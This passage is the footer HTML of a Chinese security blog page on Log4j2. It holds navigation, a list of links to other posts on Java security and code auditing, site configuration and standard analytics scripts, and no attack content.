title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2026/04/01/%E8%A7%A3%E5%86%B3hexo%E5%8D%9A%E5%AE%A2%E5%9B%BE%E7%89%87%E6%98%BE%E7%A4%BA%E9%97%AE%E9%A2%98/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div><div id="player"></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="分类于代码审计">代码审计</a></div><span><a href="/2026/03/23/Java%E5%AE%89%E5%85%A8%E4%B9%8B%E5%8F%8D%E5%B0%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">Java安全之反射基础知识</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Java%E5%AE%89%E5%85%A8/" title="分类于Java安全">Java安全</a></div><span><a href="/2026/03/29/Java%E5%AE%89%E5%85%A8%E4%B9%8BFastjson/">Java安全之Fastjson</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="分类于代码审计">代码审计</a></div><span><a href="/2026/03/15/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8Bsql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%EF%BC%88%E4%BA%8C%EF%BC%89/">Java代码审计之sql注入漏洞（二）</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="分类于代码审计">代码审计</a></div><span><a href="/2026/03/15/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8Bsql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%EF%BC%88%E4%B8%80%EF%BC%89/">Java代码审计之sql注入漏洞（一）</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/01/Java%E5%AE%89%E5%85%A8%E4%B9%8BLog4j2/">Java安全之Log4j2</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/02/JNDI%E7%9A%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">JNDI的基础知识</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Java%E5%AE%89%E5%85%A8/" title="分类于Java安全">Java安全</a></div><span><a href="/2026/03/30/Java%E5%AE%89%E5%85%A8%E4%B9%8BShiro/">Java安全之Shiro</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/06/%E5%B8%B8%E7%94%A8webshell%E5%B7%A5%E5%85%B7%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/">常用webshell工具流量分析</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%8A%80%E6%9C%AF%E9%9A%8F%E7%AC%94/" title="分类于技术随笔">技术随笔</a></div><span><a href="/2026/03/11/hello-world/">Hello World</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/01/%E8%A7%A3%E5%86%B3hexo%E5%8D%9A%E5%AE%A2%E5%9B%BE%E7%89%87%E6%98%BE%E7%A4%BA%E9%97%AE%E9%A2%98/">解决hexo博客图片显示问题</a></span></li></ul></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2026</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">Lib0gus的小屋 @ Lib0gus的博客</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">56k 字</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">51 分钟</span></div><div class="powered-by">基于 <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & Theme.<a target="_blank" rel="noopener" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
    ispost: true,
    path: `2026/04/01/Java安全之Log4j2/`,
    favicon: {
        show: `（●´3｀●）やれやれだぜ`,
        hide: `(´Д｀)大変だ！`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    nocopy: "false",
    copyright: `复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。`,
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    }
};
</script><script>var _hmt = _hmt || [];
(function () {
    const hm = document.createElement("script");
    hm.src = "https://hm.baidu.com/hm.js?true"
    hm.async = true;
    const s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(hm, s);
 })();</script><script>(function(c,l,a,r,i,t,y){
    c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
    t=l.createElement(r);t.async=true;t.src="https://www.clarity.ms/tag/"+i;
    y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
})(window, document, "clarity", "script", "true");</script><script async="async" src="https://www.googletagmanager.com/gtag/js?id=true"></script><script>window.dataLayer = window.dataLayer || [];
function gtag() {
    dataLayer.push(arguments);
}
gtag('js', new Date());
gtag('config', 'true');</script><script src="/js/siteInit.js?v=0.5.4" type="module" fetchpriority="high" defer></script></body></html>